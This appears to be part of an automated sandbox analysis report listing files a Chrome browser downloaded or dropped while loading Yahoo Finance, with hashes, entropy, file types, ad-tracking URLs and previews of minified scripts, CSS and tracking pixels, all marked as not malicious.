                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as te,p as C,k as y,i as _,c as re,A as oe,e as P,b as D,d as v,f as j,j as I,q as b,L as u,M as p,l as N,u as ue,g as me,a as de,N as S,t as M,h as q,O,n as _e,C as x,m as V}from"./scheduler.Dsuh-FKt.js";import{S as ge,i as ce,t as R,g as he,a as w,e as be}from"./index.CvwOawEI.js";import{g as ke}from"./spread.CgU5AtxT.js";import{g as ye,n as Ne,o as Pe,q as ve}from"./commonUtil.BWwawKjd.js";import{g as Ae}from"./i13nUtil.8E8_gCdn.js";/* empty css */function Se(t){const e=t.slice(),a=e[2]||!e[8]||!e[17];return e[30]=a,e}function $(t){let e=t[12],a,i,l=t[12]&&G(t);return{c(){l&&l.c(),a=C()},l(s){l&&l.l(s),a=C()},m(s,f){l&&l.m(s,f),y(s,a,f),i=!0},p(s,f){s[12]?e?te(e,s[12])?(l.d(1),l=G(s),e=s[12],l.c(),l.m(a.parentNode,a)):l.p(s,f):(l=G(s),e=s[12],l.c(),l.m(a.parentNode,a)):e&&(l.d(1),l=null,e=s[12])},i(s){i||(R(l,s),i=!0)},o(s){w(l,s),i=!1},d(s){s&&_(a),l&&l.d(s)}}}function ee(t){let e;function a(s,f){return s[7]?je:Ce}let i=a(t),l=i(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.142069457963608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU1urkltxlHh/:gg/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DB04C7B378CB2DB912C3BA8A5A774EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEE34BD86C3484D31002182AA2B7CAA4699126B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98B3D9D20E032F90ACA49E9B116225D539FF6FBDB7E42C3C363F63896AC03D2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:826225FC21717D8861A05B9D2F959539AAD2D2B131B2AFED75D88FBCA535E1B0D5A0DA8AC69713A0876A0D467848A37A0A7F926AEAFAD8CF28201382D16466AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ipac.ctnsnet.com/int/cm?exc=14&redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM0MTEmdGw9MjAxNjA=&piggybackCookie=[user_id]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141224508910417
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:DdTCIsqDmJS4RKb5ykKcvXjXRHoNcHxIjIRuAdSewD:D59mc4sl3O4UKxO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:79FF1942D2AC137CC43949E74FB9284E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:53B152950469C4BC8EA242A534D5EBACB21F408D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5B558A0B664276A90837F96BC3A66228318C68A502ACB89C6680EB01C90C06DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:012D33A667E72C9754DA88FCDE3DE3446B056BD44F88C1036481613DEF632D513EE000675C464CEBAEDE8A4060FED3F171B68BE22369A50BA725A02D24F9E6D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/add.J4mq2Ck6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6z"/></svg>';export{v as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.185125192643916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:C/2A3njBlJQ3iwpsN7VYQx4f:C/nXjBlJ9w2EQx4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4533C9C5840079F5A5AE75B3C253E57E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F650A0689665F988D2803198BF0814A8141AEDB0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E73EE504586519262B147D86CEF97D0D6FDED9F51F9EC8382EE5715CAF2FAAF2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1796D09C0824D96DA9928AFB9A677F87F5C97D0929A9AF2E5409A47B4BA979A3B1BC934EE5510C24B83AA580B83D685E980D64942AD009BDE92308E3B280BA60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://gum.criteo.com/sync?r=2&c=321&gdpr=0&gdpr_pd=0&gdpr_consent=&us_privacy=1YNN&j=window.advBidxc.mnetRtusId
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.advBidxc.mnetRtusId({"status":"OK","userid":"8oy8tpIl4cj6nTWQXyyikwcbQG92JuRd"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.92323142879762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHtwR3Zd2OfHuXOJnUhO4:YEOBq3dO+JUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EEC750FE7952218343E0567CA0981F77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F4ED408131CEBD748481483DA72AE3C3AF1A13C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1DDE2FF52B39C64A3C1AC7278B94AA286DC8DA3DFE7E497899E2249638EE7439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D181E865011A875B12997E6D724ED6043714D8E8CC7595C1DE32522F7A35D27013E6F95255E32AB8CC195F4A06C95BC0EBEE1A646C99F2492B929BDF8933E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.html?p=gumgum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.660001480021975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:0YEcA3FLVQuR7TmxS5pEOWoJCK3CJ3EcA3FLWbVkuX4t:bEcAB3yx+pEOJOEcABWbVkp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CDD5050BA6288DF47182412E30E482A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:19D881F9D478DE895E602D6A908D9A3621160ECC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0C4BAFD7F8E2A0C485CB3715F666EE47980FE1E22A7FDCCC84D213A13C058E26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:86AA7CCE16D0DC82BF7155D0C11911058E78F77D640F183E681220E71AEF7314D3AE7DAA78AC4728E37E3E011AA5010A9AAA3266A4D85FCDE3D88FC872B41C66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.games-tabs-scrollview .prev-btn[disabled]{display:none}#atomic .games-tabs>button:last-child{margin-right:10px}.games-tabs-scrollview .slides::-webkit-scrollbar{display:none}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (42665)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):98740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221261778902006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:/s0IBMb8gA5mzuPdkz6P+QcyU+z9gaeaU9bgkg2dyMD:omz8kz6P+QPAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5EA30A8527BC4B873461B3590BF88D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6E339BFBE9FED1CC7D4C316A80CED8D53E92803A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1B66E142C33D638D606EB6C6451401F88B68890B75468BBDE8886687FFCD09B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:095D7B7B01BEB5AEF2CBE68817D73A8F741D360D71E1209FBADC2CF77020F136745B204F58CC49B68BBB30A68995D8A857E2C202AE2B1C5C260F23179A3F11C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["../nodes/0.B0UP-sbn.js","../chunks/scheduler.Dsuh-FKt.js","../chunks/index.CvwOawEI.js","../nodes/1.BvZHEcz2.js","../chunks/stores.BCwnb1-k.js","../chunks/43.BgWy8GOF.js","../chunks/control.CYgJF_JY.js","../nodes/2.CK7MWYuc.js","../chunks/commonUtil.BWwawKjd.js","../chunks/PageProgressBar.D-6_6JJN.js","../chunks/ads.DhuB_mth.js","../chunks/preload-helper.D6kgxu3v.js","../chunks/globals.D0QH3NT1.js","../chunks/i13nUtil.8E8_gCdn.js","../chunks/index.rV6zwFgL.js","../chunks/each.CI2tb2RB.js","../chunks/spread.CgU5AtxT.js","../assets/PageProgressBar.BUmOb2ZZ.css","../chunks/Ads.t43t7gLT.js","../chunks/AdGroup.B9K-yuAc.js","../chunks/intersectUtil.DVqOQxux.js","../chunks/context.Bt1NApa8.js","../assets/AdGroup.BvlaXdca.css","../chunks/Header.Cq72aaJC.js","../chunks/RMP.G38kzltP.js","../assets/Header.BvCA0Mhu.css","../chunks/Link.vSNQugO0.js","../chunks/Icon.C8w5V9EK.js","../assets/Icon.DgFg0-NP.css","../assets/Link.CHR7GGSC.css","../assets/2.DPu3nbOv.css","../nodes/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (14774)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.467469009004695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:gOcucv3kPn7izj7GsDWdvev+vUj/y89UX+l77Mn9D3m4T5:gOcucv3Yn7iz/Gsydvev+vUj/y89UulQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9D58FAE43CB34C1182E9A4CBD3293ABE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1D6D6128B83DFDC229B8089B72C6EAFBC0F242A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D0B6F82BB9290248BDC40FF8F88BCC26434AE0A471F77ECD23E9E31E243E87A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:86F2C9691324E8137A814C164440C9EE08BF71CFC7EB5EB6B098E9061522ED0AD2648756E1B0816AD7003BE23D2AAFAB06F0EE42F59A80E9F028405839C6D54C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as ie,p as x,k as z,i as b,y as Se,c as U,e as R,d as O,f as T,F as Re,G as se,u as X,g as J,a as K,v as Oe,q as E,x as Le,b as M,t as Te,j as D,h as Ne,O as ce,l as P,m as Be,R as Me,A as De,B as Fe,L as v,a5 as Ye,r as ue,X as ee,a1 as We}from"./scheduler.Dsuh-FKt.js";import{S as oe,i as ae,g as j,a as u,e as H,t as c,f as _e,c as N,b as q,m as A,d as L}from"./index.CvwOawEI.js";import{T as qe,g as le,e as Ve,t as de,m as Ge}from"./commonUtil.BWwawKjd.js";import{F as je}from"./Footer.CKND0cCh.js";import{L as Ae}from"./Lazy.Csf-SYRQ.js";import{r as re}from"./resizeUtil.BFOdtaWL.js";import{A as He}from"./context.Bt1NApa8.js";import{e as me}from"./each.CI2tb2RB.js";import{C as Ue}from"./close.C3ug6nNR.js";import{E as Xe}from"./error_outline.CkdKfkE_.js";import{I as te}from"./Icon.C8w5V9EK.js";import{q as ge,a as he}from"./index.CwoOB1cS.js";import{r as Je}from"./toast.DmgsWY65.js";const Ke=s=>({}),be=s=>({resize:re,onResize:s[1]}),Qe=s=>({}),pe=s=>({resize:re,onResize:s[1]});fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8544)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.508499442445276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:i3WGNzMSvNEObNo07AxyWtXfArTYKjcUcRTWt5L+qgq/zYHjLENIX4C3:iGGtnNEYatfwqk5L+qgqrNIX4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D32A977FAEB5C547CC8EE2E1EB0C945D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:85743AE41513B53C67344C1F8C79712B24B54748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:39EAEBA8CFCF975CBB1D5D8CF7588E7A1D8F02E5140B888F507D33AB93FE4617
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AF7C7EBEBB4C7847F91EAD923FE901B72418FE4BABFD1B4A9F50A0D88BE992DDD9ACF21F5FFDFCD9EF75D7A370F8B3B0D2B779CC646B140E851A3F28B8E1626B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/AccordionItem.Bf1KTDMO.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as w,c as L,e as E,d as O,f as S,i as N,q as c,O as v,k as K,u as Q,g as W,a as Y,Q as re,b as H,j as J,L as C,l as M,A as Z,W as ee,M as le,G as ze,R as Ce}from"./scheduler.Dsuh-FKt.js";import{S as de,i as ue,t as z,a as k,g as me,e as ce,f as ae,c as ke,b as Ne,m as Ie,d as ve}from"./index.CvwOawEI.js";import{g as ye}from"./spread.CgU5AtxT.js";import{g as _e,r as Te}from"./i13nUtil.8E8_gCdn.js";import{I as Me}from"./Icon.C8w5V9EK.js";import{C as Ee}from"./expand_more.DscV4c36.js";import{s as te}from"./index.CwoOB1cS.js";import{m as Oe}from"./commonUtil.BWwawKjd.js";function Se(l){let e,a,d;const o=l[3].default,f=L(o,l,l[2],null);return{c(){e=E("div"),f&&f.c(),this.h()},l(n){e=O(n,"DIV",{class:!0});var s=S(e);f&&f.l(s),s.forEach(N),this.h()},h(){c(e,"class",a=v(`container ${l[0]}`)+" yf-10zi8b3")},m(n,s){K(n,e,s),f&&f.m(e,null),l[4](e),d=!0},p(n,[s]){f&&f.p&&(!d||s&4)&&Q(f,o,n,n[2],d?Y(o,n[2],s,null):W(n[2]),null),(!d||s&1&&a!==(a=v(`container ${n[0]}`)+" yf-10zi8b3"))&&c(e,"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5257)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5258
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239139253030382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:lLGjBRgTS+GydgTOSXY2cAQF+8eWs0G8cBXI0lO7spu3MXrYld9Vds9dhpno64:lL+RgvLdgLcfBRG8cBY0O7FM7YlzzWpU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C4D16C36AA5340CD762B1E571532784C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:93A5C7BB49465B76EEDB3AC24D96A5358E095425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4365B014B3C411112D60B61B37D860A1C5ADFC627963B8666CC8A9AED743179F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:57C83555B878D6032D08A8F43C31F58DC5F0BE59F29654447AF5A17A7240EA0DC8F363F75C09A9EC619CB7CF1FBB831CD8B1123F098A5E8F3FC7EBB6F1DFAF4A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{l as D}from"./commonUtil.BWwawKjd.js";import{g as $}from"./datetimeUtils.BKCxat1F.js";const m=.85,w=3,C=3,A=/\$\(AD_FEEDBACK\)/;function F(t,r=[1,2],o=80){const s=[],e={};return t.forEach(c=>{const n={tag:c,tags:new Map};r.map(i=>{const a=`${c}|${i}|${o}`;s.push(a),i===1?n.tag=a:n.tags.set(i,a)}),e[c]=n}),{sizeMap:e,tags:s}}function E(t,r){var i;if(!t||!r)return;const o={},s=[];if((i=t.resolutions)==null||i.forEach(a=>{a.tag&&a.url&&(o[a.tag]=a.url)}),typeof r=="string")return r in o?{src:o[r]}:void 0;const{tag:e,tags:c}=r,n=o[e];if(n){for(const[a,f]of c){const g=o[f];g&&s.push(`${g} ${a}x`)}return{src:n,srcset:s.join(", ")}}}function R(t){var s;if(!((s=t.resolutions)!=null&&s.length))return;if(t.resolutions.length===1)return{src:t.resolutions[0].url};const r=t.resolutions.filter(e=>e.tag!=="original").sort((e,c)=>e.width-c.width),o=r.map(e=>`${e.url} ${e.width}w`);return{src:r[0].url,srcset:o.join(", ")}}function _(t){var c,n,i;const r=(c=t.content.canonicalUrl)==null?void 0:c.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=appnexus&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=7992184014990425658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1039)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.924207192805264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:CNOQxreQxWQxeBQxTQxk2huFvVv7CgXQIn1jQxk6Qxk7uVQxk2ZzQxYQxzGQxp:CTLvcu2q2oF9Og3kq5qiaq2ZUxtN3
